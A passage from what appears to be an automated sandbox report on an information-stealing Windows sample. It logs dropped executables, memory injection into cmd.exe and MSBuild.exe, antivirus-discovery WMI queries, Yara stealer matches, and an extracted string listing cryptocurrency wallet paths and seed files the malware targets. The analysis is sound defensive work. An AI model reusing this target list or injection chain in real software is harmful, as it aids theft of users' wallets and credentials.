                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeNtSetInformationThread: Direct from: 0x6C85617CJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeNtSetInformationThread: Direct from: 0x6C0E617C
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeNtQuerySystemInformation: Direct from: 0x6F5BE4
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeNtProtectVirtualMemory: Direct from: 0x76EF7B2EJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read writeJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read writeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeSection loaded: NULL target: C:\Windows\SysWOW64\cmd.exe protection: read write
                                Source: C:\Windows\SysWOW64\cmd.exeSection loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe protection: read write
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,1_2_00415D00
                                Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A821000Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: F23008Jump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: 6A821000
                                Source: C:\Windows\SysWOW64\cmd.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe base: E6A008
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess created: C:\Users\user\AppData\Local\Temp\u42w.0.exe "C:\Users\user\AppData\Local\Temp\u42w.0.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess created: C:\Users\user\AppData\Local\Temp\u42w.2\run.exe "C:\Users\user\AppData\Local\Temp\u42w.2\run.exe" Jump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeProcess created: C:\Users\user\AppData\Local\Temp\u42w.3.exe "C:\Users\user\AppData\Local\Temp\u42w.3.exe" Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exeJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeProcess created: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe "C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe" /eieci=11A12794-499E-4FA0-A281-A9A9AA8B2685 /eipi=5488CB36-BE62-4606-B07B-2EE938868BD1Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe "C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe"
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA64760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,1_2_6CA64760
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C853470 GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,DuplicateToken,AllocateAndInitializeSid,LocalAlloc,InitializeSecurityDescriptor,GetLengthSid,LocalAlloc,InitializeAcl,AddAccessAllowedAce,SetSecurityDescriptorDacl,SetSecurityDescriptorGroup,SetSecurityDescriptorOwner,IsValidSecurityDescriptor,AccessCheck,2_2_6C853470
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: TrayNotifyWndShell_TrayWnd
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWndtooltips_class32SVWU
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Shell_TrayWndtooltips_class32S
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_00409D1B cpuid 0_2_00409D1B
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_0042086B
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: EnumSystemLocalesW,0_2_004170F1
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: EnumSystemLocalesW,0_2_004201F6
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: EnumSystemLocalesW,0_2_004201AB
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: EnumSystemLocalesW,0_2_00420291
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_0042031E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetLocaleInfoW,0_2_004174E4
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetLocaleInfoW,0_2_0042056E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00420697
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0041FF33
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetLocaleInfoW,0_2_0042079E
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: EnumSystemLocalesW,0_2_03167358
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetLocaleInfoW,0_2_03170A05
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_03170AD2
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,0_2_0317019A
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_031708FE
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetLocaleInfoW,0_2_0316774B
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetLocaleInfoW,0_2_031707D5
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: GetLocaleInfoW,0_2_031707D3
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: EnumSystemLocalesW,0_2_03170412
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: EnumSystemLocalesW,0_2_0317045D
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: EnumSystemLocalesW,0_2_031704F8
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,1_2_00414570
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDateJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\u42w.1.zip VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\PresentationFramework-SystemXml\v4.0_4.0.0.0__b77a5c561934e089\PresentationFramework-SystemXml.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationTypes\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationTypes.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\UIAutomationProvider\v4.0_4.0.0.0__31bf3856ad364e35\UIAutomationProvider.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0040996D GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,0_2_0040996D
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_004143C0 GetProcessHeap,HeapAlloc,GetUserNameA,1_2_004143C0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_004144B0 GetProcessHeap,HeapAlloc,GetTimeZoneInformation,wsprintfA,1_2_004144B0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_00702DA6 _memset,GetVersionExW,2_2_00702DA6
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

                                Stealing of Sensitive Information

                                barindex
                                Source: Yara matchFile source: 1.3.u42w.0.exe.2f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.u42w.0.exe.2f00000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4640000.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4640000.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.2.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f4860000.13.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000000E.00000002.2942860915.00000173F4640000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000002.2945630459.00000173F4860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.1978341064.00000173F191B000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000000E.00000000.1978341064.00000173EE71B000.00000002.00000001.01000000.00000012.sdmp, type: MEMORY
                                Source: Yara matchFile source: 3.2.cmd.exe.5e100c8.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.cmd.exe.5a000c8.7.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 17.2.cmd.exe.5a000c8.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 25.2.MSBuild.exe.1100000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 3.2.cmd.exe.5e100c8.8.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000003.00000002.2055548397.0000000005E10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000011.00000002.2204859505.0000000005A00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000019.00000002.2204440453.0000000001102000.00000002.00000001.01000000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 5424, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: cmd.exe PID: 7904, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 7672, type: MEMORYSTR
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\cqecfsbe, type: DROPPED
                                Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\oyskbsuqgrwdg, type: DROPPED
                                Source: Yara matchFile source: 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: u42w.0.exe PID: 1720, type: MEMORYSTR
                                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                                Source: Yara matchFile source: dump.pcap, type: PCAP
                                Source: Yara matchFile source: 1.3.u42w.0.exe.2f00000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.2ed0e67.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.2ed0e67.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.3.u42w.0.exe.2f00000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 1.2.u42w.0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 00000001.00000003.1714056198.0000000002F00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.2089955902.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000001.00000002.2087928703.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: u42w.0.exe PID: 1720, type: MEMORYSTR
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b0432f.7.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7c4dad.8.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1add525.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173f1b28739.4.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7b47a3.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 14.0.SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe.173ee7a537d.1.raw.unpack, type: UNPACKEDPE
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: sers\user\AppData\Roaming\\Electrum-LTC\wallets\\*.*
                                Source: u42w.0.exe, 00000001.00000002.2087928703.0000000000447000.00000040.00000001.01000000.00000005.sdmpString found in binary or memory: |1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local 